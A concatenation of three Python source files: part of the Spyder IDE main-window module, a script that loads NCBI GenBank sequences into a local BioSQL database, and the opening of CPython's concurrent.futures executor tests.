self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
order = ['editor', 'ipython_console', 'variable_explorer',
'help', 'plots', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console', None]
for plugin in self.widgetlist:
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if action:
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if type(action) is str:
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
# Internal plugins
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# New API: External plugins
for plugin_name, plugin in self._EXTERNAL_PLUGINS.items():
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError as e:
logger.error(str(e))
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.save_current_window_settings(prefix)
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(widget):
plugin._toggle_view_action.setChecked(False)
break
except AttributeError:
# Old API
if plugin.isAncestorOf(widget):
plugin._toggle_view_action.setChecked(False)
break
def toggle_lock(self, value):
"""Lock/Unlock dockwidgets and toolbars"""
self.interface_locked = value
CONF.set('main', 'panes_locked', value)
self.lock_interface_action.setIcon(
ima.icon('lock' if self.interface_locked else 'lock_open'))
self.lock_interface_action.setText(
_("Unlock panes and toolbars") if self.interface_locked else
_("Lock panes and toolbars"))
# Apply lock to panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
if self.interface_locked:
if plugin.dockwidget.isFloating():
plugin.dockwidget.setFloating(False)
plugin.dockwidget.remove_title_bar()
else:
plugin.dockwidget.set_title_bar()
# Apply lock to toolbars
# TODO: Move to layouts plugin (which will depend on Toolbar
# and MainMenu)
for toolbar in self.toolbar.toolbarslist:
if self.interface_locked:
toolbar.setMovable(False)
else:
toolbar.setMovable(True)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
@Slot()
@Slot(bool)
def maximize_dockwidget(self, restore=False):
"""Shortcut: Ctrl+Alt+Shift+M
First call: maximize current dockwidget
Second call (or restore=True): restore original window layout"""
if self.state_before_maximizing is None:
if restore:
return
# Select plugin to maximize
self.state_before_maximizing = self.saveState(
version=WINDOW_STATE_VERSION
)
focus_widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
plugin.dockwidget.hide()
try:
# New API
if plugin.get_widget().isAncestorOf(focus_widget):
self.last_plugin = plugin
except Exception:
# Old API
if plugin.isAncestorOf(focus_widget):
self.last_plugin = plugin
# Only plugins that have a dockwidget are part of widgetlist,
# so last_plugin can be None after the above "for" cycle.
# For example, this happens if, after Spyder has started, focus
# is set to the Working directory toolbar (which doesn't have
# a dockwidget) and then you press the Maximize button
if self.last_plugin is None:
# Using the Editor as default plugin to maximize
self.last_plugin = self.editor
# Maximize last_plugin
self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
try:
# New API
self.setCentralWidget(self.last_plugin.get_widget())
except AttributeError:
# Old API
self.setCentralWidget(self.last_plugin)
self.last_plugin._ismaximized = True
# Workaround to solve an issue with editor's outline explorer:
# (otherwise the whole plugin is hidden and so is the outline explorer
# and the latter won't be refreshed if not visible)
try:
# New API
self.last_plugin.get_widget().show()
self.last_plugin.change_visibility(True)
except AttributeError:
# Old API
self.last_plugin.show()
self.last_plugin._visibility_changed(True)
if self.last_plugin is self.editor:
# Automatically show the outline if the editor was maximized:
self.addDockWidget(Qt.RightDockWidgetArea,
self.outlineexplorer.dockwidget)
self.outlineexplorer.dockwidget.show()
else:
# Restore original layout (before maximizing current dockwidget)
try:
# New API
self.last_plugin.dockwidget.setWidget(
self.last_plugin.get_widget())
except AttributeError:
# Old API
self.last_plugin.dockwidget.setWidget(self.last_plugin)
self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
self.setCentralWidget(None)
try:
# New API
self.last_plugin.get_widget().is_maximized = False
except AttributeError:
# Old API
self.last_plugin._ismaximized = False
self.restoreState(self.state_before_maximizing,
version=WINDOW_STATE_VERSION)
self.state_before_maximizing = None
try:
# New API
self.last_plugin.get_widget().get_focus_widget().setFocus()
except AttributeError:
# Old API
self.last_plugin.get_focus_widget().setFocus()
self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.fullscreen_flag:
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = ima.icon(icon)
self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
if self.fullscreen_flag:
self.fullscreen_flag = False
if os.name == 'nt':
self.setWindowFlags(
self.windowFlags()
^ (Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint))
self.setGeometry(self.saved_normal_geometry)
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.saved_normal_geometry = self.normalGeometry()
if os.name == 'nt':
# Due to limitations of the Windows DWM, compositing is not
# handled correctly for OpenGL based windows when going into
# full screen mode, so we need to use this workaround.
# See spyder-ide/spyder#4291.
self.setWindowFlags(self.windowFlags()
| Qt.FramelessWindowHint
| Qt.WindowStaysOnTopHint)
screen_number = QDesktopWidget().screenNumber(self)
if screen_number < 0:
screen_number = 0
r = QApplication.desktop().screenGeometry(screen_number)
self.setGeometry(
r.left() - 1, r.top() - 1, r.width() + 2, r.height() + 2)
self.showNormal()
else:
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in IPython console and eventually set focus
to the Editor.
"""
console = self.ipyconsole
console.switch_to_plugin()
console.execute_code(lines)
if focus_to_editor:
self.editor.switch_to_plugin()
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
not_active_path, _x = encoding.readlines(
self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
OrderedDict([('/some/path, True), ('/some/other/path, False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
else:
style_name = CONF.get('appearance', 'windows_style',
self.default_style)
style = QStyleFactory.create(style_name)
if style is not None:
style.setProperty('name', style_name)
qapp.setStyle(style)
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size"""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""Wrapper to handle plugins request to restart Spyder."""
self.application.restart(reset=reset)
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
# FIXME: Why is this using the toolbars menu?
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
@Slot()
def show_tour_message(self, force=False):
"""
Show message about starting the tour the first time Spyder starts.
"""
should_show_tour = CONF.get('main', 'show_tour_message')
if force or (should_show_tour and not running_under_pytest()
and not get_safe_mode()):
CONF.set('main', 'show_tour_message', False)
self.tour_dialog = tour.OpenTourDialog(
self, lambda: self.show_tour(DEFAULT_TOUR))
self.tour_dialog.show()
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities for the 'main' function below
#==============================================================================
def create_application():
"""Create application and patch sys.exit."""
# Our QApplication
app = qapplication()
# --- Set application icon
app_icon = QIcon(get_image_path("spyder"))
app.setWindowIcon(app_icon)
# Required for correct icon on GNOME/Wayland:
if hasattr(app, 'setDesktopFileName'):
app.setDesktopFileName('spyder')
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
if PYQT5:
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
return app
def create_window(app, splash, options, args):
"""
Create and show Spyder's main window and start QApplication event loop.
"""
# Main window
main = MainWindow(splash, options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.exit_interpreter()
except BaseException:
pass
raise
main.show()
main.post_visible_setup()
if main.console:
namespace = CONF.get('internal_console', 'namespace', {})
main.console.start_interpreter(namespace)
main.console.set_namespace_item('spy', Spy(app=app, window=main))
# Propagate current configurations to all configuration observers
CONF.notify_all_observers()
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
app._has_started = True
if hasattr(app, '_pending_file_open'):
if args:
args = app._pending_file_open + args
else:
args = app._pending_file_open
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(app, splash, options, args)
else:
mainwindow = create_window(app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
02-import-sequences.py
|
from tqdm import tqdm
import traceback
from SNDG.Comparative.Pangenome import Pangenome, Strain, sqldb
from SNDG.WebServices.NCBI import NCBI
from Bio import Entrez, SeqIO
import multiprocessing
from BioSQL import BioSeqDatabase
server = BioSeqDatabase.open_database(driver="MySQLdb", user="root",
passwd="mito", host="localhost", db="bioseqdb")
def save_sequences(strain):
db = server[strain.acc]
sequencesList = Entrez.read(Entrez.esearch(
db="nuccore", term=strain.acc + "[Assembly]", idtype="acc", retmax=100000))["IdList"]
n = 150
list_of_lists = [sequencesList[i:i+n] for i in range(0, len(sequencesList), n)]
def seq_iterator():
for seq_ids in list_of_lists:
handle = Entrez.efetch(db="nuccore", id=",".join(seq_ids), rettype="gb", retmode="text")
for seq in SeqIO.parse(handle, "genbank"):
yield seq
pbar2.set_description(genome.name)
with tqdm(seq_iterator(), total=len(sequencesList)) as pbar3:
pbar3.set_description("loading sequences")
db.load(pbar3)
server.commit()
if __name__ == '__main__':
from peewee import MySQLDatabase
mysql_db = MySQLDatabase('bioseqdb', user="root", password="mito")
sqldb.initialize(mysql_db)
tables = [Pangenome,Strain]
# for x in tables:
# x.create_table()
Entrez.email = "Your.Name.Here@example.org"
genomes = list(Pangenome.select())
with tqdm(genomes) as pbar1:
for genome in pbar1:
pbar1.set_description(genome.name)
strains = list(Strain.select().where(Strain.pangenome == genome))
with tqdm(strains) as pbar2:
for strain in pbar2:
try:
if strain.acc not in server:
db = server.new_database(strain.acc, description="")
server.commit()
def save_strain():
save_sequences(strain)
p = multiprocessing.Process(target=save_strain)
p.start()
p.join(180)
if p.is_alive():
p.terminate()
p.join()
raise multiprocessing.TimeoutError()
strain.loaded = True
strain.save()
except Exception as ex:
traceback.print_exc()
server.rollback()
if strain.acc in server:
server.remove_database(strain.acc)
server.commit()
|
test_concurrent_futures.py
|
import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
test.support.import_module('threading')
from test.support.script_helper import assert_python_ok
import os
import sys
import threading
import time
import unittest
import weakref
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future)
from concurrent.futures.process import BrokenProcessPool
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
return x * y
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
class MyObject(object):
def my_method(self):
pass
class ExecutorMixin:
worker_count = 5
def setUp(self):
self.t1 = time.time()
try:
self.executor = self.executor_type(max_workers=self.worker_count)
except NotImplementedError as e:
self.skipTest(str(e))
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
dt = time.time() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 60, "synchronization issue: test lasted too long")
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
t = {executor_type}(5)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._threads), 3)
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_processes_terminate(self):
